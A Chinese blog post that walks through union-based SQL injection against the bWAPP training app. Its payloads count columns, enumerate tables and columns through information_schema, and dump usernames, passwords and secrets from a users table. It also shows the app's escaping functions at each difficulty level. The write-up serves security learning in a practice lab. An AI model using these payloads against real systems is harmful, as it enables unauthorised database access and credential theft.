bWAPP -- SQL Injection

最新推荐文章于 2023-07-06 02:18:46 发布
最新推荐文章于 2023-07-06 02:18:46 发布
阅读量270 收藏
点赞数
分类专栏: bWAPP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hee_mee/article/details/108686049
版权

bWAPP – SQL Injection (Union 注入)

注入基本流程

  1. 判断存在注入

    1' or 1=1#

    在这里插入图片描述

  2. 判断字段数量

1'  order by 8#`
#(报错)

1'  order by 7#
#(正常回显,存在7个字段)

在这里插入图片描述
在这里插入图片描述

  1. 判断可注入字段位置
1'  union select 1,2,3,4,5,6,7 #

(回显 2 3 5 4 字段可以替换)
在这里插入图片描述

  1. 使用内置函数查看数据库信息

    1'  union select 1,database(),version(),user(),5,6,7  #

在这里插入图片描述

mysql内置函数

  1. 查看表名

    1'  union select 1,database(),version(),user(),table_name,6,7 from information_schema.tables#

    在这里插入图片描述

  2. 获取表字段名

1'  union select 1,database(),version(),table_name,column_name,6,7 from information_schema.columns where table_name="users"#

在这里插入图片描述

  1. 提权相关信息

    1'  union select 1,login,Password,email,secret,6,7 from users#

在这里插入图片描述

  • low

    1'  union select 1,login,Password,email,secret,6,7 from users#

  • mid

    function sqli_check_1($data)
{
   
    return addslashes($data);
    // 语法 addslashes ( string $str ) : string
    // 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。
    // 这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。
}

    addslashes注入方法

  • high

    function sqli_check_3($link, $data)
{
   
    return mysqli_real_escape_string($link, $data);
    // 面向对象风格
    // mysqli::escape_string ( string $escapestr ) : string
    // mysqli::real_escape_string ( string $escapestr ) : string
    // 过程化风格
    // mysqli_real_escape_string ( mysqli $link , string $escapestr ) : string
    // 此函数用来对字符串中的特殊字符进行转义, 以使得这个字符串是一个合法的 SQL 语句。
    // 传入的字符串会根据当前连接的字符集进行转义,得到一个编码后的合法的 SQL 语句。
}

SQL injection 备忘清单

hee_mee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bWAPP-SQLInjectionSQLite
hee_mee的博客
09-26 357
zeronil
bwapp闯关(一)SQL injection<low>
weixin_44894271的博客
05-17 452
前言 本文章记录bwapp的SQL injection模块,web安全测试SQL注入 环境准备 docker部署bwapp火狐浏览器安装hackbar插件,登录进入bwapp页面,选择bug类型<SQL injection(GET/Search)>,并设置安全等级为low 按照字段搜索可以看到查询结果信息列表如下 单引号注入检测 根据搜索查询业务我们可以猜想查询用户信息列表的SQL大致为:select XX from database where title = “id”,此时titl
bwapp---sql注入第十二关过关过程及分析
weixin_45821250的博客
12-07 2536
SQL Injection - Stored (User-Agent) Your IP address and User-Agent string have been logged into the database! (download log file)
bwapp通关(全完结)
热门推荐
hxhxhxhxx的博客
10-20 1万+
bwapp/ A1 - Injection /HTML Injection - Reflected (GET)HTML Injection - Reflected (POST)HTML Injection - Reflected (Current URL)HTML Injection - Stored (Blog)iFrame InjectionLDAP Injection (Search)【待开化】 ---------------------- bWAPP v2.2 -----------------
bWAPP-SQL Injection - Stored (User-Agent)
最新发布
liaochonxiang的博客
07-06 118
【代码】bWAPP-SQL Injection - Stored (User-Agent)
bWAPP----SQL Injection (GET/Search)
weixin_30477293的博客
07-23 578
SQL Injection (GET/Search) 输入单引号 报错,在%'附近出错,猜测参数被 '% %'这种形式包裹,没有任何过滤,直接带入了数据库查询 输入order by查询列 union select 确定显示位 然后分别查询用户,数据库名,数据库版本 根据数据库版本知道可以通过information_schema表查询信息,查询table...
bWAPP中SQL注入思路
qq_37019068的博客
10-09 1321
bWAPP中SQL注入思路 SQL Injection (GET/Search) 等级:low 首先看看正常搜索的情况,这里我输入了一个字母b,可以看出来他把标题带有b的电影信息全都给搜出来了 在这里我猜想其构成SQL语句的代码: $sql = "select * from table where Title like '%" . $name . "%'" 接下来为了验证猜想,我输入了一个单引号 返回了一个报错,直接证明了服务器未对单引号进行过滤,意味着我们可以使用单引号进行SQL语句的闭合控制,且也
bWAPP练习--injectionSQL Injection (GET/Search)
weixin_38167363的博客
04-09 1008
SQL注入: SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 LOW: 0x01:分析一下网站的...
nacos-mysql.sql
02-05
nacos默认使用嵌入式数据库实现数据的存储,若想使用外部mysql存储nacos数据,需进行文件配置,此文件为生成nacos的数据库表的脚本。
mysql-injection.pdf
03-31
首先,文件标题“mysql-injection.pdf”和描述“MySQL注入天书---------Sqli-labs 使用手册”明确指出了文档的主题,即如何进行MySQL注入以及sqli-labs工具的使用说明。sqli-labs是一个SQL注入学习平台,可以让学习...
x-pack-sql-jdbc-7.9.1.jar
03-04
x-pack-sql-jdbc-7.9.1.jar
foodie-shop.sql
05-04
foodie-shop项目表结构+表数据
bWAPP-SQLInjectionPost2
hee_mee的博客
09-20 128
zeronil
bWAPP-SQLInjection2
hee_mee的博客
09-20 131
zeroNil
bwapp sql部分
h0ld1rs的博客
08-13 726
文章目录SQL Injection (GET/Search)SQL Injection (GET/Select)SQL Injection (POST/Search)SQL Injection (POST/Select)SQL Injection (AJAX/JSON/jQuery)SQL Injection (CAPTCHA)SQL Injection (Login Form/Hero)SQL Injection (Login Form/User)SQL Injection (SQLite)SQL Inj
bWApp SQL 注入
Yanug
09-26 1189
1.可以显示的字段 1' union select 1,2,3,4,5,6,7# 2.对mysql用户名主机名,当前数据库的版本信息,当前数据库名称,数据库路径等进行查询和显示。 1' union select 1,user(),version(),database(),5,6,7# 3.当前数据库下面的表名: 1' union select 1,table_name,table_sche...
3.bWAPP SQL注入篇
吾所在处,即为净土
01-23 2926
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
bWAPP SQL注入篇
angry_program的博客
03-03 6988
步骤 下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入,注入是字符型还是整数型 2.猜解SQL查询语句中的字段数 (order by ) 3.确定显示的字段顺序 4.获取当前数据库 (爆库) 5.获取数据库中的表 (爆表) 6.获取表中的字段名 (爆字段) 7.下载数据 (爆数据) 0x01SQL Injection (GET/Search) ...
bWAPP-LDAP Injection
hee_mee的博客
09-14 1347
zeronil
Transact-SQL语言基础教程
首先,文档简要介绍了SQL语言的历史和标准,包括SQL-89、SQL-92以及SQL3(SQL-99)标准。这些标准定义了SQL语言的主要功能,如数据定义(DDL)、数据查询(DQL)、数据操纵(DML)和数据控制(DCL)。SQL语言的设计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值